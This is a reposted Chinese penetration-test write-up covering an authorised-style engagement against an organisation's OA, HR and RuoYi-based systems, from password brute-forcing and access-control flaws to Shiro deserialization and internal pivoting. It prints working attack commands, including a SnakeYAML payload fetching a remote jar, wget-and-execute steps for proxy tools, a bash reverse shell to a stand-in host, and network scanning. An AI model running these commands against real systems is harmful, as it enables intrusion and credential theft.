某次项目练手记录

admin
admin
admin
137462
文章
113
评论
2024年5月17日20:31:31评论10 views字数 2199阅读7分19秒阅读模式

题记

最近做了一个项目,复盘以后感觉大佬就是大佬,比不了比不了。

我的思路

目标有3天半时间,半天信息收集,1天打外网,2天内网。首先通过收集到的信息通过脆弱点找内网突破口,找到突破口对内网进行测试。

Web端找入侵点

在外网发现OA系统与一个物业管理系统绑在一个ip地址上。在物业管理系统发现登陆账户上用户名写在页面上。
某次项目练手记录
通过爆破发现存在弱口令,进入后台
某次项目练手记录

Getshell失败,放弃,好吧,是因为这个站太卡了,页面定时刷新,太恶心。

转到OA系统,通过爆破,成功爆破出一个账户,进入OA。进入OA后有一些好处,一个是有很多关联系统直接进入使用,另一个是可以获取OA里所有用户的信息对其他系统爆破,还有一个是翻阅OA里文件发现一些系统与一些默认密码,更甚者可以翻到vpn等信息。

某次项目练手记录
通过OA可直接访问金蝶系统,邮箱系统。
某次项目练手记录
某次项目练手记录
在OA通过翻阅文档发现是共享采购平台用员工名字(在OA导出员工信息,把中文名用在线工具转成拼音)缩写,爆破,爆破出弱口令。
某次项目练手记录
某次项目练手记录
且此平台存在任意文件下载,下载到Linux密码文件。
某次项目练手记录

Getshell点找找,都没找到,他们系统有一个特点,能传木马但是不解析,后续拿权发现目标网站全部都是jar包起的站点,是不能通过上传webshell提权的,只能内存马或者命令执行反弹shell。

后续外网又爆破了一堆后台,这里不一一列举了。下面写两个其他系统。

1、工厂管理系统(若依二开)

通过爆破拿到普通用户权限,在修改个人资料处发现越权漏洞。可以遍历所有用户信息,于是猜想修改密码处有越权。

某次项目练手记录

成功越权修改密码,他对原密码并没有效验。使用管理员登录后台发现1万多信息,把运维人员,管理层人员,承运商信息,开发人员信息全部导出用于后续攻击。

本来想利用定时任务反弹shell的,经测试失败,他的定时任务没有填字符串的地方。
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://xxx/payload-v2.jar"]]]]')
2、人事系统
前面拿到人事系统人员信息,利用拿到的信息定向爆破(使用工号登录后台),成功爆破出hr后台密码,拿到全部人员信息。

外网进内网的点

目标大量使用若依框架二开的站点,众所周知,若依使用了shiro的框架。所以他外网存在3,4个shiro反序列化漏洞。

这里我是利用一个上传nps代理进内网,一个上传fscan进行扫描,一个windows上线cs抓系统密码,浏览器密码。

1、上传nps代理进内网

mkdir ../test
本来我想用ew正向代理进去的,后来发现我不知道他的ip,这时候才知道大佬们为啥喜欢用nps,确实方便管理。
wget -P ../test http://xxx/ew_linux_x64chmod 777 ../test/ew_linux_x64../test/ew_linux_x64 -s ssocksd -l 9000

运行nps:

wget -P ../test http://ip/linux_amd64_client.tar.gztar -zxvf ../test/linux_amd64_client.tar.gz -C ../test../test/npc -server=ip:8024 -vkey=4z4oardkqdtu4ro6 -type=tcp
2、反弹shell

shiro拿到权限之后,经测试echo 'bash -i >& /dev/tcp/ip/7778 0>&1' > ../test/1.sh是不行的。最优解是先写好1.sh,然后控制肉鸡远程下载1.sh。

Vps监听端口:nc -nlvp 7778wget -P ../test http://xxx/1.sh../test/1.sh

上传fscan到目标上,本地挂代理扫会出各种各样问题。

wget -P ../test http://xxx/fscan_amd64../test/fscan_amd64 -h ip/16 -p 80 -np -nopoc -o b.txt

先探测存活的网段。

../test/fscan_amd64 -hf ip.txt -np -nopoc -o ip-c.txt
漏洞挖掘。
3、windows上线cs抓系统密码,浏览器密码。

翻到一些系统的管理员密码。登录后台。

某次项目练手记录

某次项目练手记录

内网横向

因为时间太短,内网我的成果不是很多。下面主要记录内网经常要用到的思路。
内网资产搜集;多关注windows系统,可以用永恒之蓝渗透;关注nacos、vmware等可控制大部分主机的系统;利用漏洞获取数据库,系统密码,然后利用密码对跑出的22,3306,1433,445等端口进行密码撞库。

大佬思路

1、重点找运维人员的信息。

其他技术问题

1、拿到服务器权限发现是jar包起的web站点。
某次项目练手记录
这时候可以吧jar包复制到其他目录,然后后缀改成zip,解压后就可以拿到配置文件,翻数据库密码。
某次项目练手记录
某次项目练手记录
文章来源:博客园(@11阳光)原文地址:https://www.cnblogs.com/sunny11/p/16105414.html

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

某次项目练手记录

原文始发于微信公众号(黑白之道):某次项目练手记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日20:31:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某次项目练手记录https://cn-sec.com/archives/2048829.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息